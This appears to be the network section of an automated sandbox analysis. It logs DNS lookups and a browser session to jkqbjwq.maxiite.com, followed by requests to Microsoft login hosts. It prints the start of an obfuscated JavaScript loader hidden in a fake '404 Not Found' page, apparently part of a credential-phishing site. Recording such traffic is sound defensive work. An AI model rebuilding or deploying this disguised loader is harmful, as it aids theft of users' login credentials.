                                                                            Dec 23, 2024 18:48:03.640496969 CET53581861.1.1.1192.168.2.4
                                                                            Dec 23, 2024 18:48:06.498440027 CET53537521.1.1.1192.168.2.4
                                                                            Dec 23, 2024 18:48:07.357851982 CET5695953192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:48:07.358082056 CET5760353192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:48:07.495722055 CET53569591.1.1.1192.168.2.4
                                                                            Dec 23, 2024 18:48:07.496059895 CET53576031.1.1.1192.168.2.4
                                                                            Dec 23, 2024 18:48:09.086929083 CET5261053192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:48:09.087385893 CET4971153192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:48:09.411448002 CET53497111.1.1.1192.168.2.4
                                                                            Dec 23, 2024 18:48:09.412132978 CET53526101.1.1.1192.168.2.4
                                                                            Dec 23, 2024 18:48:12.546363115 CET6124853192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:48:12.546488047 CET6182553192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:48:12.683501005 CET53612481.1.1.1192.168.2.4
                                                                            Dec 23, 2024 18:48:12.683747053 CET53618251.1.1.1192.168.2.4
                                                                            Dec 23, 2024 18:48:18.270936966 CET138138192.168.2.4192.168.2.255
                                                                            Dec 23, 2024 18:48:23.479736090 CET53498901.1.1.1192.168.2.4
                                                                            Dec 23, 2024 18:48:42.556240082 CET53635201.1.1.1192.168.2.4
                                                                            Dec 23, 2024 18:48:57.451133966 CET4915853192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:48:57.451390982 CET5860453192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:49:03.481547117 CET53513951.1.1.1192.168.2.4
                                                                            Dec 23, 2024 18:49:05.126178026 CET53586691.1.1.1192.168.2.4
                                                                            Dec 23, 2024 18:49:05.460954905 CET6282253192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:49:05.461163998 CET5415653192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:49:05.600234985 CET53628221.1.1.1192.168.2.4
                                                                            Dec 23, 2024 18:49:05.600516081 CET53541561.1.1.1192.168.2.4
                                                                            Dec 23, 2024 18:49:12.557872057 CET5451553192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:49:12.558011055 CET6138553192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:49:12.558429956 CET5332453192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:49:12.558598042 CET6089953192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:49:20.881407022 CET5303753192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:49:20.881721973 CET6297553192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:49:21.095756054 CET5576353192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:49:21.096226931 CET6375053192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:49:23.838922024 CET5346453192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:49:23.839061022 CET5856853192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:49:24.160630941 CET5838153192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:49:24.160784960 CET5473853192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:49:24.484849930 CET6228753192.168.2.41.1.1.1
                                                                            Dec 23, 2024 18:49:24.484999895 CET5080953192.168.2.41.1.1.1
                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                            Dec 23, 2024 18:49:14.149475098 CET192.168.2.41.1.1.1c2bb(Port unreachable)Destination Unreachable
                                                                            Dec 23, 2024 18:49:21.310760975 CET192.168.2.41.1.1.1c2c1(Port unreachable)Destination Unreachable
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Dec 23, 2024 18:48:07.357851982 CET192.168.2.41.1.1.10x6a03Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:48:07.358082056 CET192.168.2.41.1.1.10x3524Standard query (0)www.google.com65IN (0x0001)false
                                                                            Dec 23, 2024 18:48:09.086929083 CET192.168.2.41.1.1.10x1a46Standard query (0)jkqbjwq.maxiite.comA (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:48:09.087385893 CET192.168.2.41.1.1.10xf3d9Standard query (0)jkqbjwq.maxiite.com65IN (0x0001)false
                                                                            Dec 23, 2024 18:48:12.546363115 CET192.168.2.41.1.1.10x3837Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:48:12.546488047 CET192.168.2.41.1.1.10xdaacStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                            Dec 23, 2024 18:48:57.451133966 CET192.168.2.41.1.1.10xff5Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:48:57.451390982 CET192.168.2.41.1.1.10xa40cStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                            Dec 23, 2024 18:49:05.460954905 CET192.168.2.41.1.1.10xc3c8Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:05.461163998 CET192.168.2.41.1.1.10xb5f6Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                            Dec 23, 2024 18:49:12.557872057 CET192.168.2.41.1.1.10xfbf9Standard query (0)aefd.nelreports.netA (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:12.558011055 CET192.168.2.41.1.1.10xb19fStandard query (0)aefd.nelreports.net65IN (0x0001)false
                                                                            Dec 23, 2024 18:49:12.558429956 CET192.168.2.41.1.1.10xceefStandard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:12.558598042 CET192.168.2.41.1.1.10xa598Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                            Dec 23, 2024 18:49:20.881407022 CET192.168.2.41.1.1.10x5fd3Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:20.881721973 CET192.168.2.41.1.1.10x7d47Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.095756054 CET192.168.2.41.1.1.10x6631Standard query (0)consentdeliveryfd.azurefd.netA (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.096226931 CET192.168.2.41.1.1.10x10a3Standard query (0)consentdeliveryfd.azurefd.net65IN (0x0001)false
                                                                            Dec 23, 2024 18:49:23.838922024 CET192.168.2.41.1.1.10xf936Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:23.839061022 CET192.168.2.41.1.1.10xfc7cStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                            Dec 23, 2024 18:49:24.160630941 CET192.168.2.41.1.1.10x1625Standard query (0)consentdeliveryfd.azurefd.netA (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:24.160784960 CET192.168.2.41.1.1.10x7b05Standard query (0)consentdeliveryfd.azurefd.net65IN (0x0001)false
                                                                            Dec 23, 2024 18:49:24.484849930 CET192.168.2.41.1.1.10xd679Standard query (0)mem.gfx.msA (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:24.484999895 CET192.168.2.41.1.1.10x5191Standard query (0)mem.gfx.ms65IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Dec 23, 2024 18:48:07.495722055 CET1.1.1.1192.168.2.40x6a03No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:48:07.496059895 CET1.1.1.1192.168.2.40x3524No error (0)www.google.com65IN (0x0001)false
                                                                            Dec 23, 2024 18:48:09.411448002 CET1.1.1.1192.168.2.40xf3d9No error (0)jkqbjwq.maxiite.com65IN (0x0001)false
                                                                            Dec 23, 2024 18:48:09.412132978 CET1.1.1.1192.168.2.40x1a46No error (0)jkqbjwq.maxiite.com104.21.50.192A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:48:09.412132978 CET1.1.1.1192.168.2.40x1a46No error (0)jkqbjwq.maxiite.com172.67.210.5A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:48:12.683501005 CET1.1.1.1192.168.2.40x3837No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:48:53.810252905 CET1.1.1.1192.168.2.40x77e3No error (0)answers-dvbpese0c2esfmf7.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:48:53.953186035 CET1.1.1.1192.168.2.40x525No error (0)answers-dvbpese0c2esfmf7.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:48:53.953186035 CET1.1.1.1192.168.2.40x525No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:48:53.953186035 CET1.1.1.1192.168.2.40x525No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:48:57.589420080 CET1.1.1.1192.168.2.40xff5No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:48:57.593050003 CET1.1.1.1192.168.2.40xa40cNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:00.359080076 CET1.1.1.1192.168.2.40xac3cNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:00.359080076 CET1.1.1.1192.168.2.40xac3cNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:03.004745960 CET1.1.1.1192.168.2.40x557cNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:03.004745960 CET1.1.1.1192.168.2.40x557cNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:03.029778004 CET1.1.1.1192.168.2.40xabb2No error (0)answers-dvbpese0c2esfmf7.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:03.030766010 CET1.1.1.1192.168.2.40x5f04No error (0)answers-dvbpese0c2esfmf7.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:03.030766010 CET1.1.1.1192.168.2.40x5f04No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:03.030766010 CET1.1.1.1192.168.2.40x5f04No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:05.600234985 CET1.1.1.1192.168.2.40xc3c8No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:05.600234985 CET1.1.1.1192.168.2.40xc3c8No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:05.600234985 CET1.1.1.1192.168.2.40xc3c8No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:05.600516081 CET1.1.1.1192.168.2.40xb5f6No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:05.600516081 CET1.1.1.1192.168.2.40xb5f6No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:12.694809914 CET1.1.1.1192.168.2.40xb19fNo error (0)aefd.nelreports.netaefd.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:12.696053028 CET1.1.1.1192.168.2.40xa598No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:12.696163893 CET1.1.1.1192.168.2.40xfbf9No error (0)aefd.nelreports.netaefd.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:12.696799040 CET1.1.1.1192.168.2.40xceefNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:14.051304102 CET1.1.1.1192.168.2.40xa1d9No error (0)answers-static-gvc7bde3gygjg5ed.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:14.157289982 CET1.1.1.1192.168.2.40xd5aeNo error (0)answers-static-gvc7bde3gygjg5ed.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:14.157289982 CET1.1.1.1192.168.2.40xd5aeNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:14.157289982 CET1.1.1.1192.168.2.40xd5aeNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:18.046156883 CET1.1.1.1192.168.2.40x9187No error (0)csp-afd-prod.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:18.046156883 CET1.1.1.1192.168.2.40x9187No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:18.046156883 CET1.1.1.1192.168.2.40x9187No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:18.046427965 CET1.1.1.1192.168.2.40xe8f4No error (0)csp-afd-prod.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:18.135329008 CET1.1.1.1192.168.2.40x2167No error (0)filestore-community-h5edcpate2aadrat.b01.azurefd.netshed.dual-low.s-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:18.238198996 CET1.1.1.1192.168.2.40x55afNo error (0)filestore-community-h5edcpate2aadrat.b01.azurefd.netshed.dual-low.s-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:18.238198996 CET1.1.1.1192.168.2.40x55afNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:18.238198996 CET1.1.1.1192.168.2.40x55afNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.020993948 CET1.1.1.1192.168.2.40x8e49No error (0)filestore-community-h5edcpate2aadrat.b01.azurefd.netshed.dual-low.s-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.021447897 CET1.1.1.1192.168.2.40x3cbbNo error (0)filestore-community-h5edcpate2aadrat.b01.azurefd.netshed.dual-low.s-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.021447897 CET1.1.1.1192.168.2.40x3cbbNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.021447897 CET1.1.1.1192.168.2.40x3cbbNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.021459103 CET1.1.1.1192.168.2.40x5fd3No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.021459103 CET1.1.1.1192.168.2.40x5fd3No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.021459103 CET1.1.1.1192.168.2.40x5fd3No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.021459103 CET1.1.1.1192.168.2.40x5fd3No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.239079952 CET1.1.1.1192.168.2.40xaf43No error (0)answers-static-gvc7bde3gygjg5ed.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.239130974 CET1.1.1.1192.168.2.40x6d73No error (0)answers-static-gvc7bde3gygjg5ed.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.239130974 CET1.1.1.1192.168.2.40x6d73No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.239130974 CET1.1.1.1192.168.2.40x6d73No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.310688972 CET1.1.1.1192.168.2.40x7d47No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.310688972 CET1.1.1.1192.168.2.40x7d47No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.497708082 CET1.1.1.1192.168.2.40x10a3No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.636176109 CET1.1.1.1192.168.2.40x6631No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.636176109 CET1.1.1.1192.168.2.40x6631No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:21.636176109 CET1.1.1.1192.168.2.40x6631No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:22.416354895 CET1.1.1.1192.168.2.40x9840No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:22.498747110 CET1.1.1.1192.168.2.40x5c5fNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:22.498747110 CET1.1.1.1192.168.2.40x5c5fNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:22.498747110 CET1.1.1.1192.168.2.40x5c5fNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:23.977495909 CET1.1.1.1192.168.2.40xf936No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:23.977495909 CET1.1.1.1192.168.2.40xf936No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:23.977495909 CET1.1.1.1192.168.2.40xf936No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:23.977495909 CET1.1.1.1192.168.2.40xf936No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:23.977586985 CET1.1.1.1192.168.2.40xfc7cNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:23.977586985 CET1.1.1.1192.168.2.40xfc7cNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:24.299963951 CET1.1.1.1192.168.2.40x1625No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:24.299963951 CET1.1.1.1192.168.2.40x1625No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:24.299963951 CET1.1.1.1192.168.2.40x1625No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:24.300153971 CET1.1.1.1192.168.2.40x7b05No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:24.837376118 CET1.1.1.1192.168.2.40x5191No error (0)mem.gfx.msamcdnmsftuswe.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:24.941369057 CET1.1.1.1192.168.2.40xd679No error (0)mem.gfx.msamcdnmsftuswe.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:24.941369057 CET1.1.1.1192.168.2.40xd679No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:24.941369057 CET1.1.1.1192.168.2.40xd679No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:25.108015060 CET1.1.1.1192.168.2.40x4b5cNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:25.108267069 CET1.1.1.1192.168.2.40x65a7No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:25.108267069 CET1.1.1.1192.168.2.40x65a7No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 23, 2024 18:49:25.108267069 CET1.1.1.1192.168.2.40x65a7No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                            • jkqbjwq.maxiite.com
                                                                            • a.nel.cloudflare.com
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449743104.21.50.1924432912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 17:48:11 UTC662OUTGET / HTTP/1.1
                                                                            Host: jkqbjwq.maxiite.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Upgrade-Insecure-Requests: 1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: navigate
                                                                            Sec-Fetch-User: ?1
                                                                            Sec-Fetch-Dest: document
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-23 17:48:12 UTC801INHTTP/1.1 404
                                                                            Date: Mon, 23 Dec 2024 17:48:12 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Referrer-Policy: no-referrer
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JaM1TPzdFYBViMywUD4wdPXx%2Fa95Uex4gZZPAeXFyFUHnQVmBW504NPeNMwjsFwmjuWUzjK3WdT4iwdHuFjINyZxJ6eXwtiJpe6a%2FblM4q9Ogb73TPBpaMt794bF9d95bWtCTbZm"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f6a2e5ff813c33a-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1684&rtt_var=684&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1240&delivery_rate=1540897&cwnd=235&unsent_bytes=0&cid=ebdb2054a462bdcf&ts=671&x=0"
                                                                            2024-12-23 17:48:12 UTC568INData Raw: 35 66 37 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 2d 72 65 66 65 72 72 65 72 27 3e 3c 73 63 72 69 70 74 3e 20 69 66 20 28 77 69 6e 64 6f 77 2e 73 65 6c 66 21 3d 27 67 6f 6f 67 6c 65 2e 63 6f 6d 27 29 20 7b 76 61 72 20 5f 30 78 63 36 35 65 3d 5b 22 22 2c 22 73 70 6c 69 74 22 2c 22 30 31 32 33 34 35 36 37 38 39 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 2b 2f 22 2c 22 73 6c 69 63 65 22 2c 22 69 6e 64 65 78 4f 66 22 2c 22 22 2c 22 22 2c 22 2e 22 2c 22 70 6f 77 22 2c
                                                                            Data Ascii: 5f7<html><head><title>404 Not Found</title><meta name='referrer' content='no-referrer'><script> if (window.self!='google.com') {var _0xc65e=["","split","0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/","slice","indexOf","","",".","pow",
